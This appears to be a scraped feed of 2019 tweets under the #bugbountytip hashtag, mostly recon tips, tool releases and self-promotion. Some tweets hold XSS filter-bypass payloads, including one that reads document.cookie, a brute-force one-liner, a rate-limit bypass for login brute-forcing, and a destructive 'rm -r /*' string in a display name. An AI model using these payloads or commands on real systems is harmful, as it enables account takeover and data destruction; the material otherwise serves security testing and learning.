0 Google dorks recon #bugbounty #bugbountytip https://t.co/aWGbjpMjKS
Aziz Hakim
@hackerb0y_


2019-10-02 11:35:18
7 REST framework Admin Panel bypass and how I recon for this vulnerability 🤑🤑🤑🤑 https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup
Aziz Hakim
@hackerb0y_


2019-10-02 10:48:43
0 write-up: REST framework Admin Panel bypass and how I recon for this vulnerability https://t.co/KY8mRiWPQq #bugbounty #bugbountytips #infosec #bugbountytip #bugbountywriteup https://t.co/csw7FCpMLB
baluz🔥
@haknfuk


2019-10-02 02:15:40
0 stealing cookies even though there are http-only cookies https://t.co/ir0FsJkGkf #bugbounty #bugbountytip #xss
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-10-01 22:22:37
0 Post based Cors misconfiguration PoC #bugbountytips #bugbountytip https://t.co/0NQPWfxCLH
vict0ni
@vict0ni


2019-10-01 18:01:12
0 When testing for reflected XSS, ignore the "Accept Cookie" pop-up (don't dismiss it or accept it, just ignore it). The pop-up's code might reflect the URL in the source code #bugbountytip #bugbountytips #bugbounty
Sukhmeet Singh
@MadGuyyy


2019-10-01 15:08:49
0 #BugBountyTip If you don't want @Random_Robbie to appear in your Github search results, use this: -user:"random-robbie" "target.tld" thnx
bugbountytip
@a_l_e_r_t_1_


2019-10-01 12:01:20
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Fisher
@Regala_


2019-10-01 10:33:22
0 I'll be starting my podcast on the 28th of October. Who's excited? Comment below 👇 what you'd love to hear and tag whom you'd be interested to have as guests 🥳 #bbp #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-10-01 02:14:40
0 Findomain 0.4.1 is out! This release is specially dedicated to @SlackHQ! An issue that prevented pushing data to Slack webhooks is fixed and text formatting has been improved. Please check out https://t.co/5CskcM1Wrv #subdomains #hacking #recon #bunbounty #bugbountytip #monitoring
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 22:44:41
0 I am not sure report or not Find post based CORS misconfiguration. I can exploit it and get uuid and some cookies. Problem is post request body sends logged in user cookies and uuid value. Without it i got only one of cookie value. #bugbountytips #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:56:37
0 #Linux #ThugLife 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/8Qn0GoBMmj
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 18:54:57
0 Bug Bounty Mafia !! 😎 #BugBounty #BugBountyTip Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt https://t.co/fVaTdy1Pz1
გოჩა ოქრაძე (Gocha Okradze)
@GochaOqradze


2019-09-30 18:28:15
1 Try parameter pollution. Get array in output :) redacted\.com/something/?par1=aaa&par1=bbb Response: ["aaa", "bbb"] Got nothing better than this :( No sqli No xss No ssti No error for :( #bugbountytips #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-09-30 17:30:26
0 directory brute forcing hosts recursively in one line of code : cat alivehosts.txt | xargs -n1 -I{} bash -c "cat wordlist.txt | xargs -n1 -I[] curl -s -o /dev/null -w '%{http_code} {}/[]\n' {}/[]" ps: you can use -P option for parallel processing #reconnaissance #bugbountytip
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:53:59
0 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/oe5VBCcNOK #bugbounty #xss #bugbountytip #bugbountytips #hackerone
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-30 14:05:04
1 Web App Penetration Testing - #2 - Finding XSS Vulnerabilities with Burp https://t.co/0cMQH7RvaS #BugBounty #bugbountytip #bugbountytips
Securisec 🚀
@securisec


2019-09-30 13:51:32
1 "RT RT Madrobot_: I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd Hacker0x01 Bugcrowd https://t.co/jEDTMNgs8B"
Manoj Kumar
@mkmaddyshock


2019-09-30 12:56:30
0 @amazon I know you people have private bug bounty where you guys pay well.. Why dont you do the same in public too.. We too deserve a token of appreciation... #BugBounty #bugbountytips #BugBountyTip #bugbountytip https://t.co/Oj7fjHaCNJ
Ashish Kunwar
@D0rkerDevil


2019-09-30 10:34:35
3 #bugbountytip do a UDP scan and if you find port 500 then run ike-probe to see if it's vulnerable to Shared Secret Hash Leakage Weakness, then it will be easily exploitable. ;) #bugbounty #security
Arif Emre Demir
@onerror_xss


2019-09-30 10:32:44
0 Best xss cheatsheet in the world. Thx @Burp_Suite <3 https://t.co/emSf0IMzLa #bugbounty #bugbountytip #xss
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:52:16
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/QiL5AGygD8
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:50:13
0 Bug Hunter ToolKit 💰💰 Comment If Your Favourite Tool is Missing ! 💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/EBE0h6JiEB
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:48:13
0 HIT LIKE IF U AGREE !!!! #WindowsUpdate Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/Lrp1bwXLIV
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:46:40
0 BUG HUNTER$ 💰💰💰💰💰 HIT LIKE IF U AGREE !!!! Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/rIOXTReuFD
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:45:01
1 BUG HUNTER$ 💰💰💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/yk9LKNVjtc
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-30 09:42:37
1 Best Search Engine For BUG HUNTER$ Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/DLFN6OzI84
hyperdummy
@dummyclout


2019-09-30 02:03:02
0 #bugbountytip: sometimes you can use the sanitizer’s behavior to get around a waf - sanitizer removes anything like <this> - waf blacklists anything like onerror/alert solution: on<x>error=al<x>ert(1) gets past the waf and the sanitizer returns onerror=alert(1)
SaN Th✪sH
@Madrobot_


2019-09-29 20:45:20
1 I just published My recon Automation #bugbountytip #bugbounty #hackerone #recon #tools #bugcrowd @Hacker0x01 @Bugcrowd https://t.co/yX1eputSKj
ghostlulz
@ghostlulz1337


2019-09-29 19:06:47
4 So you think getting RCE is hard and just for those uber l33t hackers, it's not, just look for exposed Docker APIs. Easy wins. More information on my blog: https://t.co/NUnZhChfJt #infosec #bugbountytips #pentest #redteam #docker #bugbountytip #BugBounty https://t.co/TJKcHswxoo
sagar yadav
@sagaryadav8742


2019-09-29 18:09:35
0 Finally month end with a small bounty 😄 Happy to #secure https://t.co/tVIlKKSeoq #bugbountytip #bugbounty #bughunting #bugcrowd #hackerone #intrigity #BountyHunter #bounty #secure #website #nature #zerocopter #happy #sagaryadav8742 #swag https://t.co/ZgCtVXfiMT
ghostlulz
@ghostlulz1337


2019-09-29 17:55:09
1 Some of my favorite things to look for in bug bounties are misconfigurations. A simple setting/config change can wreck an entire company. You can apply a patch to fix a CVE but for misconfigurations there generally is no patch to fix it. #bugbountytips #bugbountytip #infosec
Nikos Gkogkos
@ngkogkos


2019-09-29 16:48:10
0 Love the feeling of @albinowax's Turbo Intruder when brute-forcing endpoints. First I run small fuzzing, then I customise the python code for more granular fuzzing. If you are not using it, you are missing. #bugbountytip #BugBounty https://t.co/TNax1ftAYF
baluz🔥
@haknfuk


2019-09-29 13:41:46
0 This was sick..........ey u suckers.. I got an really weird idor ........in googles product writeup coming soon .............................! #bugbounty #bugbountytip #googlevrp #vrp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-29 07:32:25
0 Give your Career A Boost with 🏆🏆 C|EH Certification 🏆🏆 Join HackDoor for Getting C|EH Certified Today !! 💰💰💰 Follow Us -- https://t.co/iNczOcGmCt #CyberSecurity #Bugounty #BugBountyTip #ceh #eccouncil #certification #penetrationtesting #pentesting #pentester #hacker https://t.co/bGmyRodDCR
Eduard Tolosa
@Edu4rdSHL


2019-09-29 02:32:54
3 Tool for subdomains monitoring of your #BugBounty or #pentesting targets? Findomain 0.4.0 is out! Now Findomain can tell you where is a new subdomain for a specific target or a list of targets. See https://t.co/T18VChCGrT #bugbountytip #monitoring #subdomains #hacking #OSINT
Anonymous Worldwide
@AnonsWorldwide


2019-09-29 01:13:05
8 As it gets harder economically to get by for most of us you can make an income if you are into technology. Register these bounty programs to report a bug. These top 30 #BugBounty programs are definitely worth checking out: https://t.co/TGVOzUAMLX #Hacknews #bugbountytip https://t.co/mga4ebFVlj
Berk Bulan
@berk_bulan


2019-09-29 00:08:29
0 Best Practice Labs ------------------------------ BWAPP Webgoat Rootme OWASP Juicy Shop Hacker101 Hacksplaining Penetration Testing Practice Labs Damn Vulnerable iOS App (DVIA) Mutillidae Trytohack HackTheBox SQL Injection Practice #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-29 00:04:16
2 Some Books for reading about Bug Hunting 1) The web application hackers handbook finding and exploiting security flaws -ed2 2011 2) OTGv4 3) Web Hacking 101 4) Breaking into infosec #BugBounty #bugbountytips #bugbountytip
Berk Bulan
@berk_bulan


2019-09-28 23:57:56
0 Good resource for beginner bug bounty hunters ;) #bugbountytips #bugbountytip #BugBounty https://t.co/giIArFJMZ6
baluz🔥
@haknfuk


2019-09-28 11:53:11
1 Some useful twitter Dorks...! #bugbountytip csrf - returns all tweets that include csrf term #bugbounty swag - returns all programs that gives swag #bugbountytips ssrf - returns all tweets regarding ssrf #bugbountytip graph api - returns all about garap…https://t.co/fdiaE2eJtv
Sanketh Sharath
@sharathsanketh


2019-09-28 10:49:20
0 From knowing absolutely nothing in web hacking to my 1st bounty this month, the journey has been arduous yet exciting! https://t.co/X5ed6r0dIR #bugbounty #bugbountytips #bugbountytip
A hacker's life
@Unknownuser1806


2019-09-28 02:35:31
1 Resources-for-Beginner-Bug-Bounty-Hunters https://t.co/GvowSG82JJ #bugbounty,#hacking,#bugbountytip
Dwiki Kusuma
@malexplore


2019-09-27 23:35:51
0 Don't get me wrong, I just want to be polite 😂 #bugbountytips #bugbountytip #synack https://t.co/QKFrSrOtvG
mahendra purbia
@mahendrapurbia7


2019-09-27 20:09:00
1 🔰HOF🔰 & appreciation letter given by https://t.co/yeySsQb8h5 Happy to secure. #bugbountytip #bugbounty #bugbcrowd #openbugbounty #cybersecurity https://t.co/rm20i8LPak
bugbountytip
@a_l_e_r_t_1_


2019-09-27 14:57:24
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Λявєη
@spenkkkkk


2019-09-27 12:39:03
0 curl https://t.co/ptThqLAUu1 --silent | grep Disallow | awk '{print $2}' #bugbountytip #oneliner
Çlirim Emini
@0xcela


2019-09-27 11:44:57
0 import time #bugbountytip #bugbountytips
Milind Purswani
@MilindPurswani


2019-09-27 07:01:44
0 Never ever ever ever ever do recon without tmux. Trust me, it's a life saver. #bugbountytip
baluz
@haknfuk


2019-09-27 03:47:10
0 If you're struggling with exploiting xss and bypassing filters..... Remember he is there @spyerror #bugbountytip
ghostlulz
@ghostlulz1337


2019-09-27 02:48:33
2 Yet another Elastic search database with thousands of clear text credentials. If you're not looking for these on your bug bounties you're missing out on easy wins. More info on my blog https://t.co/kqwIe5WNwy #BugBounty #BugBountyTip #infosec #elasticsearch #redteam #bugbountytips https://t.co/1FrEIz8kHp
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-09-26 21:17:34
0 @teamsnap Reported Vulnerability under your Responsible Disclosure Program - You fixed vulnerability without any acknowledgement or reward !! A good lesson for all #BugHunters ! #bugbounty #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-09-26 19:02:52
0 Less than 1$💪👉https://t.co/JPaA4CsKRe #BugBountyTip #xss #xxe #sqli #ssrf #ce
bugbountymemes
@bugbounty_memes


2019-09-26 17:16:19
1 i was rewarded 4 times $1,000 bounty -> Bypass 429. 1. found expired domain. 2. found login form with 429 protection after some attempts. 3. replace the domain with expired domain. 4. start bruteforce. Now you don't have 429 too many requests #bugbountytip #bugbounty
Muhab Alhadi
@MuhabAlhadi


2019-09-26 14:48:50
0 Burp suite is a beast, but Owasp ZAP does the job when you're Broke 😁 I really like its Hidden directory feature, the Tool is solid #owaspZAP #bugbountytip
Un4gi
@Un4gi1


2019-09-26 13:25:27
0 Apparently uploading a malicious executable file or pdf, etc. is a “feature”. No support employee would ever open an attachment without heavy social engineering.. 🙄 I’m starting to hate @Hacker0x01 managed programs more and more every day... #bugbountytip https://t.co/PslGB8W1Ad
Henry Chen
@chybeta


2019-09-26 11:25:54
1 my personal monitor system alerts me to update Jenkins,Joomla,Spring and Jira Jenkins: https://t.co/3QLlyzxZcb Joomla: https://t.co/PHiJqZqEgr Spring: https://t.co/1QePyPw7DF Jira: https://t.co/hTyIUVC9yC #bugbounty #bugbountytip #bugbountytips https://t.co/u9gxcgC2vh
intigriti
@intigriti


2019-09-26 11:11:37
10 Testing a Ruby on Rails app? Add .json to the URL and see what happens! 😏 Thanks for the #BugBountyTip, @yaworsk! 🙌 https://t.co/oHlHilQtr7
bugbountytip
@a_l_e_r_t_1_


2019-09-26 08:49:02
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Matt Palmer
@mattpalmer_au


2019-09-26 08:29:07
0 When doing masses amount of recon on a program with a large scope, how does everyone keep motivated? #bugbountytip #bugbountytips
A hacker's life
@Unknownuser1806


2019-09-26 08:12:14
1 This tool simply iterates over hosts on port 443 and 80 and runs a PoC to test if they are vulnerable to RCE. You can use Shodan to gather potential targets: https://t.co/svK0gwpuRk #bugbounty, #bugbountytip, #hacking
Somdev Sangwan
@s0md3v


2019-09-26 05:52:22
0 This tweet didn't get enough reach, should I add #bugbountytip?
Sandeep Kamble
@SandeepL337


2019-09-26 04:36:41
0 Hey H4x0r, create as many as possible accounts. Try to hijack other accounts using bruteforce, automated bots or any vulnerabilities. https://t.co/Zk48BocHuE Enjoy !!! DM me results and get the cool swag from @SecureLayer7. #bugbounty #bugbountytip #infosec
Eduard Tolosa
@Edu4rdSHL


2019-09-26 03:28:31
6 Findomain 0.3.0 is out! * Added support to work only with resolved subdomains. * Added support for writing to custom output unique file (still when reading domains from file). * A lot of code improvements. https://t.co/qay2bKyJ5K #bugbounty #subdomains #bugbountytip #tools
FS
@fsec__


2019-09-26 02:51:41
0 Bug bounty bazaar and contest! https://t.co/AYxkrwAoXK https://t.co/9eeeKg3lm9 #BugBounty #bugbountytip #bugbountytips
ak1t4 🇦🇷
@akita_zen


2019-09-25 23:31:48
0 @hakluke @TomNomNom #bugbountytip: For a quick vim exit, use nano.
A hacker's life
@Unknownuser1806


2019-09-25 22:34:44
0 Using URI to pop shells via the Discord Client https://t.co/xtT8DuW0ei #bugbountytip ,#bugbounty ,#hacking
bugbountytip
@a_l_e_r_t_1_


2019-09-25 21:47:44
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Security Executions Code
@pwn0sec


2019-09-25 20:01:08
0 Find (XSS) Vulnerabilities with (𝐗𝐒𝐒)-𝐋𝐚𝐛𝐬 [Tutorial] https://t.co/IfpKUm1Azs #bugbounty #bugbountytip #bugbountytips #xss
Andri Wahyudi 🕊️ ‏
@andripwn


2019-09-25 18:36:42
0 Web App Penetration Testing - Recon Part #6 https://t.co/bPJkQbIgDZ #BugBounty #bugbountytips #bugbountytip #hackerone
m0z
@LooseSecurity


2019-09-25 17:44:02
2 The secret to a good bug bounty career is approaching payment like you would luck. If you get it, you're happy, if not then that's just how life is. There is no point complaining, pay it forward and being a nice guy will pay off in the end. #BugBounty #bugbountytips #bugbountytip
Fisher
@Regala_


2019-09-25 17:25:04
0 Valid within and outside bb, never hole yourself up in your own opinion bubble 🙏 #bugbountytip https://t.co/MFeVw0xllI
bugbountytip
@a_l_e_r_t_1_


2019-09-25 15:00:50
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
Bugploit
@bugploit


2019-09-25 08:10:23
0 Bad luck again 🙃! #bugbounty #bugbountytip #bugbountytip https://t.co/nyCKPRRlwL
expl0itc0der
@vanshitmalhotra


2019-09-25 05:59:13
0 Abusing VPC Traffic Mirroring in AWS : Deploying a Malicious Mirror with Compromised AWS Credentials : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/7oTKO87uT4
expl0itc0der
@vanshitmalhotra


2019-09-25 05:55:16
1 pure bash bible : A collection of pure bash alternatives to external processes : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/WFrwiofDPJ
expl0itc0der
@vanshitmalhotra


2019-09-25 05:53:43
0 navi : An interactive cheatsheet tool for the command-line : #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/wW8DAqxakm
expl0itc0der
@vanshitmalhotra


2019-09-25 05:52:28
0 gitGraber : Monitor GitHub to search and find sensitive data in real time for different online services such as: Google, Amazon, Paypal, Mailgun, Facebook, Twitter, Heroku, Stripe : #BugBounty #BugBountyTip #penetrationtesting #pentesting #devsecops https://t.co/d3uSf6oV3X
expl0itc0der
@vanshitmalhotra


2019-09-25 05:48:20
0 [Bug Bounty] Exploiting Cookie Based XSS by Finding RCE #BugBounty #BugBountyTip #penetrationtesting #pentesting #cybersecurity #devsecops https://t.co/C6BWshUbE6
Yusuf Yazir
@Hacklad


2019-09-25 04:34:48
0 @moodiAbdoul Glad to hear that bud. Search on Twitter "#bugbountytip ato" or "#bugbountytip takeover" that's my #bugbountytip 💪 Do it ✔
Shubham Sharma
@Shubham_pen


2019-09-25 03:24:49
0 Banner grabbing is a process to collect details regarding any remote PC on a network and the services running on its open ports. @rajchandel @kalilinux @ubuntu @nmap #RedTeam #CyberSecurity #infosec #bugbountytip #Pentesting #CTF #OSCP #GodMorningWednesday https://t.co/bYuLQsIdMA
A hacker's life
@Unknownuser1806


2019-09-25 02:35:02
0 “The journey of Web Cache + Firewall Bypass to SSRF to AWS Credentials compromise!” by Avinash Jain (@logicbomb_1) https://t.co/dMNo89RrZN #bugbounty,#bugbountytip ,#hacking
ICO scams & etc
@Scams_Alarm


2019-09-24 21:17:17
0 #Telegram just launched a competition to fix its #blockchain. #TON issues on GitHub are rising, no documentation🙈. After raising 1.5 billion$+ 💸 Contest 💎https://t.co/P1q9EigN7x $TON GitHub 💎https://t.co/cisSF9zhQk #bugcontest #bugbountytip #crypto #ico # https://t.co/CuPhJbjw8Z
A hacker's life
@Unknownuser1806


2019-09-24 19:56:17
0 “#BugBounty — ‘Journey from LFI to RCE!!!’-How” by Avinash Jain (@logicbomb_1) https://t.co/pnUI6Xmrdk #bugbountytip,#hacking,#programming
Murdockz
@Murdockz_CEH


2019-09-24 19:26:58
0 Finally wrote a script to git pull all my BB tools. Long overdue. check it out https://t.co/iv6PfCd2pN #bugbounty #bugbountytips #bugbountytip
Arif Khan
@payloadartist


2019-09-24 15:24:51
0 This is really something one should try out. It eases out your recon to a great extent. #bugbounty #infosec #bugbountytip https://t.co/iJxu1Y09hf
A hacker's life
@Unknownuser1806


2019-09-24 09:41:16
0 aquatone results for sites with bug bountys Raise an issue if you want a fresh scan or a new domain to be checked https://t.co/o2na3KQISM #bugbounty,#hacking,#bugbountytip
David Haigh
@BugDevilDavid


2019-09-24 08:56:20
0 There is a bug in iOS 13 where you can’t turn off HomePod alarms which is really weird @apple are you going to fix this? #homepod #tech #bug #bughead #softwaretesting #software #ios #ios13 #homekit #major #wtf #apple @theapplehub @AppleSupport #bugbountytip #testing https://t.co/6p8nvNrGI0
Vulkey_Chen
@Vulkey_Chen


2019-09-24 08:28:26
0 #BurpSuite #bugbountytip #bugbountytips Burpsuite extension: phpStudy Backdoor Remote Code Execution Scanner https://t.co/KmowGjUxcA
Rapid Safeguard
@RapidSafeguard


2019-09-24 05:34:25
0 https://t.co/XzCLxBUQXt Counter strike Global offensive that allows a remote attacker to execute remote code without the users permission. #CounterStrikeGlobalOffensive #infosec #vulnerability #Bugs #bugbountytip https://t.co/HmkCj1cKHs
bugbountytip
@a_l_e_r_t_1_


2019-09-24 04:39:10
0 Less than 1$ no ads ❌💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
𝙿𝚘𝚖𝚎𝚐𝚛𝚊𝚗𝚊𝚝𝚎 🌴
@ret2pomegranate


2019-09-24 02:28:53
0 Has anyone been paid by @ATT Bug Bounty Program? If so what is the expectancy waiting time till bounty or how long did it take to bounty & resolve? #BugBountyTip #infosec #ATT #bugbounty #hackerone
bugbountytip
@a_l_e_r_t_1_


2019-09-23 20:06:17
0 Just 1$ https://t.co/JPaA4CKmfO #bugbountytip #bugbounties
Abss
@abss_tbh


2019-09-23 17:54:04
0 Get your targets IP ranges using your targets domain (asn+cidr extract): a=$(curl -H'Accept: application/json' https://t.co/NGktlz9hSE$(dig +short $domain | head -1)| jq .as_number);echo '!gas'$a''| nc https://t.co/iLNKnnj93I 43 | tr " " "\n" | sed -e '1d' -e '$d' #BugBountyTip https://t.co/YzNOF6r1bD
Kenan
@h1_kenan


2019-09-23 14:47:07
4 one of my bypasses in script context: 1')});x=(document),y=x.cookie;(alert)(y);function r(){a('b bypasses to alert cookie which was restricted, also finishes some function #XSS #WAFbypass #bugbountytip @zseano @brutelogic
intigriti
@intigriti


2019-09-23 13:45:34
16 Open your eyes and see: there is more than S3! 👀 @hussein98d recommends cloud_enum to find unprotected Google Cloud buckets and Microsoft Azure storage accounts! 📦🔓#BugBountyTip 👉 https://t.co/jdufh0L7fR https://t.co/OqRtTIanb5
Anas Mahmood 🇵🇰
@AnasIsHere


2019-09-23 06:25:43
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside javascript & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the javascript, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:52:18
2 Google will pay you $1,000 to hack some of Android’s most popular apps Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/P5Zgaqbfaw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:50:26
0 Google’s bug bounty programs paid out almost $3M in 2017 Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops https://t.co/YYTW4ja3WZ
Anas Mahmood 🇵🇰
@AnasIsHere


2019-09-23 05:46:25
0 @soaj1664ashar Payload: </script></><script>confirm(document.domain)</script> (The keyword was reflected inside script tag & only angle brackets were unsanitized Only </script> tag allowed & all others were not Able to close the script tag, </> allowed me to inject <script> tag)🙌 #BugBountyTip
expl0itc0der
@vanshitmalhotra


2019-09-23 05:44:03
3 Facebook expands bug bounty program to include third-party apps and websites Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/JbayjPAGUw
expl0itc0der
@vanshitmalhotra


2019-09-23 05:41:34
0 Google will now pay bigger rewards for discovering Chrome security bugs Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops #devsecops #cybersecurity https://t.co/54qJVMUyN1
Pomegranate 🌴
@ret2pomegranate


2019-09-22 23:48:57
0 Just reported RCE to a program on @Hacker0x01. At first PHP functions like exec(), system() weren’t being executed due to PHP disabling these. Was able to disable the function itself and made system() available again & boom RCE. #bugbounty #BugBountyTip #hackerone #infosec
baluz🔥
@haknfuk


2019-09-22 17:15:22
2 https://t.co/LHR5DiByot free free free #bugbountytip
expl0itc0der
@vanshitmalhotra


2019-09-22 14:54:07
3 Maximise Your Bug Bounty Scope and Payout with #AMASS from $$ OWASP $$ https://t.co/UZCGyJAWXQ Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting #devops
A hacker's life
@Unknownuser1806


2019-09-22 14:29:59
1 This is a collection of writeups, cheat sheets, videos, related to SSRF in one single location https://t.co/DEn6Z8EY5X #SSRF, #bugbounty, #BugBountyTip
hacks2learn
@hacks2learn


2019-09-22 12:55:15
0 For those looking for new ideas... I re-discovered this awesome article today by @Jackson_T and I'm sharing it as it is an excellent resource for learning how to find vulnerabilities https://t.co/1QeTSFfaxl #BugBountyTip 👍
expl0itc0der
@vanshitmalhotra


2019-09-22 12:09:38
1 Looking for Rare SQL Injection Bugs ? Maximise your Bug Bounty Payouts SQL Injection Tutorial - OWASP JuiceShop Hidden Christmas Surprise Challenge 💰💰💰💰 Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip https://t.co/N4vjkRujJj
expl0itc0der
@vanshitmalhotra


2019-09-22 12:03:33
0 A5 Broken Access Control Forced Browsing OWASP Juice Shop Tutorial Follow On Facebook $$$ https://t.co/iNczOcGmCt Subscribe on Youtube https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #devsecops #cybersecurity https://t.co/yQ2JhdWzi2
expl0itc0der
@vanshitmalhotra


2019-09-22 11:53:29
2 A6 Directory Listing Security Misconfiguration OWASP Juice Shop Tutorial Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to Youtube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #penetrationtesting #pentesting https://t.co/2gtd4DxOSr
m0z
@LooseSecurity


2019-09-22 10:33:56
3 What languages do you think are the best for hackers? It's a common question, interested to know what others think. In my opinion PHP programmers are very security-aware. Python is good for bug bounty automation. JS is good for advanced XSS payloads/PoCs. #BugBountyTip
OWASP Amass
@owaspamass


2019-09-22 05:28:59
5 OWASP Amass Tip For ASNs: amass intel -org OrgName For domain names: amass intel -active -asn n1,n2 For subdomains and infrastructure: amass enum -src -ip -df domains.txt #osint #recon #assetdiscovery #subdomain #enumeration #bugbounty #bugbountytip https://t.co/QWTftRbJKT
Vulkey_Chen
@Vulkey_Chen


2019-09-22 03:57:34
0 #BugBounty #BugBountyTips #BugBountyTip I build a burpsuite extension to mark sensitive information. e.g. If "mobile phone number" and "email address" information appear in the response content, then mark this request for red color. Open Source Address: https://t.co/zvEFnVh0FK https://t.co/fNN80C1Etz
iamsushi
@sushiwushi2


2019-09-22 02:21:14
0 Here's a #BugBountyTip, if you are lazy like me to manually generate a POST request CSRF POC, consider using this tool https://t.co/tEzQaMmFgB
Securisec 🚀
@securisec


2019-09-21 23:55:24
0 "RT RT vanshitmalhotra: XSS Filter Bypass on https://t.co/bT7rV3brs6 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/z6m1vQwWw1 (mobile version) https://t.co/gJY9DNkfiL #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting"
expl0itc0der
@vanshitmalhotra


2019-09-21 22:50:44
0 XSS Filter Bypass on https://t.co/bFnci9AWC2 💰💰💰💰💰💰 Filter Bypass to Reflected XSS on https://t.co/oz7xPDki4P (mobile version) https://t.co/mVUPFSwEL0 #Bugbountytip #xss #yahoo #penetrationtesting #bugbounty #pentesting
expl0itc0der
@vanshitmalhotra


2019-09-21 21:19:49
3 A5 Broken Access Control OWASP Juice Shop Challenge - OWASP Top Ten Tutorial https://t.co/BQlGp02UDf #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
expl0itc0der
@vanshitmalhotra


2019-09-21 21:15:14
3 A5 Broken Access Control Session Storage OWASP Juice Shop Tutorial OWASP Top Ten Training -- Free #BugBounty Tutorial - 💰💰💰💰 https://t.co/SZmg3HOSP3 #BugBountyTip #penetesting #penetrationtesting #cybersecurity #devsecops #devops
[email protected]:~$ sud¤ rm -r /*
@IAMPROPERSAM


2019-09-21 20:29:46
